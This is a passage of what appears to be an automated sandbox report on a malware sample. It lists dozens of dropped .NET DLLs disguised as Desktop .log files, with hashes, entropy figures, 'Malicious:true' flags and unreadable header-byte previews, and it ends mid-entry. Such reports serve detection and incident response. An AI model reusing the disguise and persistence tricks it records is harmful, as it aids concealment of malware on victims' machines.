                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                        C:\Users\user\Desktop\udNLVcin.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Users\user\Desktop\ukroqyJE.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ulxeAMJt.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                        C:\Users\user\Desktop\uvTpeyOg.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\uztGBGQb.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\vNbglcZZ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\vVgeAcHF.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\vZGvXkKA.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\vpCPqhyF.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\vqpwvlrw.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\vrvmFyrk.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\vvnfIPHx.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):46592
                                                        Entropy (8bit):5.870612048031897
                                                        Encrypted:false
                                                        SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                        MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                        SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                        SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                        SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\wWhDskZv.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\wfzurMmi.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\wgyFlLYZ.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34304
                                                        Entropy (8bit):5.618776214605176
                                                        Encrypted:false
                                                        SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                        MD5:9B25959D6CD6097C0EF36D2496876249
                                                        SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                        SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                        SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\wnjMVvNo.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\xATktOEY.log

                                                        Download File
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\xjEfhhcu.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\xxZNeyLt.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\yERXsZaS.log

                                                        Download File
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
